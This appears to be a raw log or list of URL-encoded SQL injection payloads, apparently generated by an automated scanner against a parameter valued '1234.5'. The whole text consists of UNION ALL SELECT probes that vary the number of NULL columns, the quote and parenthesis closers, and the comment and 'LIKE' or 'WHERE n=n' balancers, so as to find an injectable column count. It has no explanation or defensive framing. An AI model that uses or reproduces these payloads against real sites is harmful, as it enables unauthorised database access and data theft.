1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22ldek%22%20LIKE%20%22ldek 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22dyLx%22%20LIKE%20%22dyLx 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22mfKR%22%20LIKE%20%22mfKR 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22UmJh%22%20LIKE%20%22UmJh 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22DnHq%22%20LIKE%20%22DnHq 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22cOVX%22%20LIKE%20%22cOVX 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22lpJM%22%20LIKE%20%22lpJM 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22pawB%22%20LIKE%20%22pawB 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22XmMn%22%20LIKE%20%22XmMn 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22THff%22%20LIKE%20%22THff 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22sgvU%22%20LIKE%20%22sgvU 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22nbav%22%20LIKE%20%22nbav 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22taWp%22%20LIKE%20%22taWp 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22sIml%22%20LIKE%20%22sIml 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22kTsl%22%20LIKE%20%22kTsl 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22vIcV%22%20LIKE%20%22vIcV 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22uoRy%22%20LIKE%20%22uoRy 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22NWyt%22%20LIKE%20%22NWyt 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22uAXO%22%20LIKE%20%22uAXO 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Ktek%22%20LIKE%20%22Ktek 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22traV%22%20LIKE%20%22traV 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22NKZY%22%20LIKE%20%22NKZY 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22Jrft%22%20LIKE%20%22Jrft 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22mHor%22%20LIKE%20%22mHor 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22ReOh%22%20LIKE%20%22ReOh 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22bERA%22%20LIKE%20%22bERA 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22kUrf%22%20LIKE%20%22kUrf 1234.5%29%20WHERE%204715%3D4715%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%208603%3D8603%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%205958%3D5958%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%205366%3D5366%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%203597%3D3597%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%208803%3D8803%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%201501%3D1501%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%209645%3D9645%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%203962%3D3962%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20WHERE%202732%3D2732%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%203693%3D3693%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%203984%3D3984%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%205079%3D5079%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%208891%3D8891%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%203175%3D3175%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%209084%3D9084%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%202079%3D2079%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20WHERE%202204%3D2204%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 